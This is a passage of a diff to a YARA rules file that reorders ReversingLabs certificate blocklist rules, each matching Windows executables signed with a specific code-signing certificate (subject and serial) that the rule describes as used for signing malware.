 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "6986e7bd90842647ec6a168c30dca2d5ae8ae5b1c1014f966dd596a78859ac6e"
+		logic_hash = "b5282fc85bbbee50c5307fff923e9e477fed8c011288e2ebd61c4b3ee801bc62"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15581,21 +37975,21 @@ rule REVERSINGLABS_Cert_Blocklist_4B03Cabe6A0481F17A2Dbeb9Aefad425 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RASSVET, OOO" and pe.signatures [ i ] . serial == "4b:03:ca:be:6a:04:81:f1:7a:2d:be:b9:ae:fa:d4:25" and 1603230930 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Henan Maijiamai Technology Co., Ltd." and pe.signatures [ i ] . serial == "4e:ff:a8:b2:16:e2:4b:16:20:29:40:c1:bc:2f:a8:a5" and 1404691199 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_64Cd303Fa289790Afa03C403E9240002 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_57D7153A89Bbf4729Be87F3C927043Aa : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "86644ef8-4218-5a04-9655-c7d51729872d"
+		id = "9b778a20-8a0c-5c9f-8cc3-9e5054713e13"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6104-L6120"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L207-L223"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f51556a8a12affbd7f7633bf8daa50e6332fa3d3448ea08853cf8ed28e593680"
+		logic_hash = "a8de7951bd25c8a9346ef341d8bf9c9147f9fa6913e952be40fb43d3d7a370c1"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15605,21 +37999,21 @@ rule REVERSINGLABS_Cert_Blocklist_64Cd303Fa289790Afa03C403E9240002 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MAITLAND TRIFECTA, INC." and pe.signatures [ i ] . serial == "64:cd:30:3f:a2:89:79:0a:fa:03:c4:03:e9:24:00:02" and 1602723600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Open Source Developer, zhenganjun" and pe.signatures [ i ] . serial == "57:d7:15:3a:89:bb:f4:72:9b:e8:7f:3c:92:70:43:aa" and 1469059200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_07Cef66A71C35Bc3Aed6D100C6493863 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_028E1Deccf93D38Ecf396118Dfe908B4 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9c16c370-a382-54f7-ba2e-3b738740966f"
+		id = "6dfb0181-299f-5a28-b647-137d75f747a6"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6122-L6138"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L225-L241"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "e741fc13fe4d03b145ed1d86e738b415a7260eae5b0908c6991c9ea9896f14cf"
+		logic_hash = "b07c797652ef19c7e0b23c3eddbbbf2700160d743d71a0005b950160474638d8"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15629,21 +38023,21 @@ rule REVERSINGLABS_Cert_Blocklist_07Cef66A71C35Bc3Aed6D100C6493863 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fubon Technologies Ltd" and pe.signatures [ i ] . serial == "07:ce:f6:6a:71:c3:5b:c3:ae:d6:d1:00:c6:49:38:63" and 1602740890 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fortuna Games Co., Ltd." and pe.signatures [ i ] . serial == "02:8e:1d:ec:cf:93:d3:8e:cf:39:61:18:df:e9:08:b4" and 1392163199 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Be77Fe5C58B7A360Add6A3Fced4E8334 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_40575Df73Eaa1B6140C7Ef62C08Bf216 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "1bbaebe9-b3ca-5ee2-91ac-b2343ca8bb86"
+		id = "6a6e6320-8e01-5ec7-8119-3e90f1eacc4e"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6140-L6158"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L243-L259"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "cea0d217206562c0045843405802d3b2fad01bdb2a4cfb52057625b43f5f8eee"
+		logic_hash = "7da8e98f38413e5cbb18e3c7771c530afb766dd9fbeb8fdd2264617aff24f920"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15653,21 +38047,21 @@ rule REVERSINGLABS_Cert_Blocklist_Be77Fe5C58B7A360Add6A3Fced4E8334 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Incar LLC" and ( pe.signatures [ i ] . serial == "00:be:77:fe:5c:58:b7:a3:60:ad:d6:a3:fc:ed:4e:83:34" or pe.signatures [ i ] . serial == "be:77:fe:5c:58:b7:a3:60:ad:d6:a3:fc:ed:4e:83:34" ) and 1602530730 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dali Feifang Tech Co.,LTD." and pe.signatures [ i ] . serial == "40:57:5d:f7:3e:aa:1b:61:40:c7:ef:62:c0:8b:f2:16" and 1394063999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_F097E59809Ae2E771B7B9Ae5Fc3408D7 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_049Ce8C47F1F0E650Cb086F0Cfa7Ca53 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "1eed6f30-0648-5b8e-81ff-9f3af0f1c91d"
+		id = "aebba591-2024-584a-bba6-9a27049cf4b8"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6160-L6178"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L261-L277"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "9e23ff26d3e1ea181e48fc23383e3717804858bc517a31ec508fa0753730c78e"
+		logic_hash = "9ae4a236e1252afc1db6fae4e388a53ebde7e724cc07c213d4bfc176cf0a0096"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15677,21 +38071,21 @@ rule REVERSINGLABS_Cert_Blocklist_F097E59809Ae2E771B7B9Ae5Fc3408D7 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ABEL RENOVATIONS, INC." and ( pe.signatures [ i ] . serial == "00:f0:97:e5:98:09:ae:2e:77:1b:7b:9a:e5:fc:34:08:d7" or pe.signatures [ i ] . serial == "f0:97:e5:98:09:ae:2e:77:1b:7b:9a:e5:fc:34:08:d7" ) and 1602542033 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Select'Assistance Pro" and pe.signatures [ i ] . serial == "04:9c:e8:c4:7f:1f:0e:65:0c:b0:86:f0:cf:a7:ca:53" and 1393804799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0Cf1Ed2A6Ff4Bee621Efdf725Ea174B7 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_29F42680E653Cf8Fafd0E935553F7E86 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "7f7ecbcd-7a92-526d-99a8-d849fffa19cb"
+		id = "f616e92c-ed9f-581c-aa15-970bddfb073a"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6180-L6196"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L279-L295"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "7030c122905105c72833cfcb41692bd9a67cf456e3309afce0b8f9e65c6aa5c1"
+		logic_hash = "6c726e4c2933a6472d256a18ea5265660ff035d05036ab9cae3409ab5a7c7598"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15701,21 +38095,21 @@ rule REVERSINGLABS_Cert_Blocklist_0Cf1Ed2A6Ff4Bee621Efdf725Ea174B7 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LEVEL LIST SP Z O O" and pe.signatures [ i ] . serial == "0c:f1:ed:2a:6f:f4:be:e6:21:ef:df:72:5e:a1:74:b7" and 1603036100 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Wemade Entertainment co.,Ltd" and pe.signatures [ i ] . serial == "29:f4:26:80:e6:53:cf:8f:af:d0:e9:35:55:3f:7e:86" and 1390175999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_1249Aa2Ada4967969B71Ce63Bf187C38 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0C15 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "5b2876a2-8dfa-5456-a615-4ea69df53422"
+		id = "4a7a5404-1a20-53a7-9670-6f5215582c9d"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6198-L6214"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L297-L313"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f84568cfe6304af0307a34bfed6dd346a74e714005b5e6f22a354b14f853ec65"
+		logic_hash = "1ee88813270dddeeedd90edbce9be2ce74303a6799ee64b0e9bfaea7377d3b2d"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15725,21 +38119,21 @@ rule REVERSINGLABS_Cert_Blocklist_1249Aa2Ada4967969B71Ce63Bf187C38 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Umbrella LLC" and pe.signatures [ i ] . serial == "12:49:aa:2a:da:49:67:96:9b:71:ce:63:bf:18:7c:38" and 1599181200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "William Richard John" and pe.signatures [ i ] . serial == "0c:15" and 1387324799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_D59A05955A4A421500F9561Ce983Aac4 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0C0F : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "088f0f98-328b-50fa-b1e4-1d80023b3c09"
+		id = "919a62ba-2902-5088-ad92-9f1bae23e68f"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6216-L6234"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L315-L331"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "b7ed87a03f20872669369cc3cad4eae40ba597f06222194bd67262c094083ec1"
+		logic_hash = "0f8fda07dc362b7e04892446f1abe1e5f5717ee715824a2c1f6550096c366701"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15749,21 +38143,21 @@ rule REVERSINGLABS_Cert_Blocklist_D59A05955A4A421500F9561Ce983Aac4 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Olymp LLC" and ( pe.signatures [ i ] . serial == "00:d5:9a:05:95:5a:4a:42:15:00:f9:56:1c:e9:83:aa:c4" or pe.signatures [ i ] . serial == "d5:9a:05:95:5a:4a:42:15:00:f9:56:1c:e9:83:aa:c4" ) and 1601895290 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dmitry Vasilev" and pe.signatures [ i ] . serial == "0c:0f" and 1386719999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_539015999E304A5952985A994F9C3A53 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_06A164Ec5978497741Ee6Cec9966871B : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ccb4da10-3178-5d8f-be17-9c689e794418"
+		id = "6c73206d-3d5c-5540-a2e1-d00138d7e1b5"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6236-L6252"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L333-L349"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "feeb1710bd5b048c689a2e45575529624cd1622dcc73db8fe7de6c133fdc5698"
+		logic_hash = "8a27015d94a3bd8543a8ca9202831ffc9c9e65f61bf26ed6825c3e746b6af0d4"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15773,21 +38167,21 @@ rule REVERSINGLABS_Cert_Blocklist_539015999E304A5952985A994F9C3A53 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Service lab LLC" and pe.signatures [ i ] . serial == "53:90:15:99:9e:30:4a:59:52:98:5a:99:4f:9c:3a:53" and 1599181200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "JOHN WILLIAM RICHARD" and pe.signatures [ i ] . serial == "06:a1:64:ec:59:78:49:77:41:ee:6c:ec:99:66:87:1b" and 1385596799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0B1926A5E8Ae50A0Efa504F005F93869 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_1121Ed568764E75Be35574448Feadefcd3Bc : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ce437144-0f99-5c41-8d15-edeceb34de4d"
+		id = "44fa007f-f5f7-5001-8b92-eb4a657ea756"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6254-L6270"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L351-L367"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "1cbdf39a873c83d2b55723215fb4930a3ce23b6cab2d71a6cd5f16b2721e30f9"
+		logic_hash = "3316a2536920c5aa9dd627cec7678e6fe33c722b4830dd740009c20dd013c9ab"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15797,21 +38191,21 @@ rule REVERSINGLABS_Cert_Blocklist_0B1926A5E8Ae50A0Efa504F005F93869 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Nordkod LLC" and pe.signatures [ i ] . serial == "0b:19:26:a5:e8:ae:50:a0:ef:a5:04:f0:05:f9:38:69" and 1600650000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FRINORTE COMERCIO DE PECAS E SERVICOS LTDA - ME" and pe.signatures [ i ] . serial == "11:21:ed:56:87:64:e7:5b:e3:55:74:44:8f:ea:de:fc:d3:bc" and 1385337599 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0A23B660E7322E54D7Bd0E5Acc890966 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_6Ed2450Ceac0F72E73Fda1727E66E654 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "daae5f42-59ff-5838-9444-93357eaa9d60"
+		id = "c19ddbde-eec0-5ebb-8f11-1e7dcb489bc8"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6272-L6288"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L369-L385"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "17996dd0ec81623dbd4eeea98f9bbe37c11c911ca840833ecb9301bb0a9ddb52"
+		logic_hash = "0e5af7795c825367d441c8abc2aa835fa83083eb8ee1f723c7d2dacff1ca88ff"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15821,21 +38215,21 @@ rule REVERSINGLABS_Cert_Blocklist_0A23B660E7322E54D7Bd0E5Acc890966 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ARTBUD RADOM SP Z O O" and pe.signatures [ i ] . serial == "0a:23:b6:60:e7:32:2e:54:d7:bd:0e:5a:cc:89:09:66" and 1601254800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Hohhot Handing Trade and Business Co., Ltd." and pe.signatures [ i ] . serial == "6e:d2:45:0c:ea:c0:f7:2e:73:fd:a1:72:7e:66:e6:54" and 1376092799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6Cfa5050C819C4Acbb8Fa75979688Dff : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_32665079C5A5854A6833623Ca77Ff5Ac : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f91ecc17-7406-552a-8864-c9e1657a5ca9"
+		id = "7078e95f-8bbe-5446-b9cb-c079f8448cb1"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6290-L6308"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L387-L403"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "cffc234be78446191dd5f5990db9f17c7e28eeaa3e16f1eb8ad4ed1e58fdc25e"
+		logic_hash = "6b734ca733c5fbadcb490ffd4c19c951e0fc17dd9b660eca948b126038c42cdb"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15845,21 +38239,21 @@ rule REVERSINGLABS_Cert_Blocklist_6Cfa5050C819C4Acbb8Fa75979688Dff : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Elite Web Development Ltd." and ( pe.signatures [ i ] . serial == "00:6c:fa:50:50:c8:19:c4:ac:bb:8f:a7:59:79:68:8d:ff" or pe.signatures [ i ] . serial == "6c:fa:50:50:c8:19:c4:ac:bb:8f:a7:59:79:68:8d:ff" ) and 1600176940 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ohanae" and pe.signatures [ i ] . serial == "32:66:50:79:c5:a5:85:4a:68:33:62:3c:a7:7f:f5:ac" and 1381967999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_044E05Bb1A01A1Cbb50Cfb6Cd24E5D6B : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_01A90094C83412C00Cf98Dd2Eb0D7042 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c0796bc3-96cd-5d12-a0ee-97d8ed4a3076"
+		id = "e5059974-9ea2-5497-a728-c21a6cdd30e4"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6310-L6326"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L405-L421"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "40c80d3b6bedb0b3454e14501745a6e82b6ea9ac202748867a2e937fb79c6f6c"
+		logic_hash = "5a3de0e6de5cda39e40988f9e2324cbee3e059aff5ceaf7fd819de8bf7215808"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15869,21 +38263,21 @@ rule REVERSINGLABS_Cert_Blocklist_044E05Bb1A01A1Cbb50Cfb6Cd24E5D6B : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MUSTER PLUS SP Z O O" and pe.signatures [ i ] . serial == "04:4e:05:bb:1a:01:a1:cb:b5:0c:fb:6c:d2:4e:5d:6b" and 1601427600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FreeVox SA" and pe.signatures [ i ] . serial == "01:a9:00:94:c8:34:12:c0:0c:f9:8d:d2:eb:0d:70:42" and 1376956799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_B7F19B13De9Bee8A52Ff365Ced6F67Fa : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_55Efe24B9674855Baf16E67716479C71 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "0e7e235e-3f0b-5396-9c19-9336d9cbb95a"
+		id = "c1a4102e-ce78-5a4d-95ea-b9e394df0c28"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6328-L6346"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L423-L439"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "a8d2a92b44cdd7b123907a6a77ba0fc9fde4961f9ac846b36f1e87730a1efae6"
+		logic_hash = "2cf7a76ae3c3a698564013ff545c74d0319face5aa19416c93bf10f45f84f8c9"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15893,21 +38287,21 @@ rule REVERSINGLABS_Cert_Blocklist_B7F19B13De9Bee8A52Ff365Ced6F67Fa : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ALEXIS SECURITY GROUP, LLC" and ( pe.signatures [ i ] . serial == "00:b7:f1:9b:13:de:9b:ee:8a:52:ff:36:5c:ed:6f:67:fa" or pe.signatures [ i ] . serial == "b7:f1:9b:13:de:9b:ee:8a:52:ff:36:5c:ed:6f:67:fa" ) and 1574914319 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "S2BVISIO BELGIQUE SA" and pe.signatures [ i ] . serial == "55:ef:e2:4b:96:74:85:5b:af:16:e6:77:16:47:9c:71" and 1374451199 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_B61B8E71514059Adc604Da05C283E514 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_094Bf19D509D3074913995160B195B6C : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "2587d30d-e9c8-599c-9cc4-4d4a7aa83c34"
+		id = "8241e2c6-e4e7-581c-b759-6314d2e28a4d"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
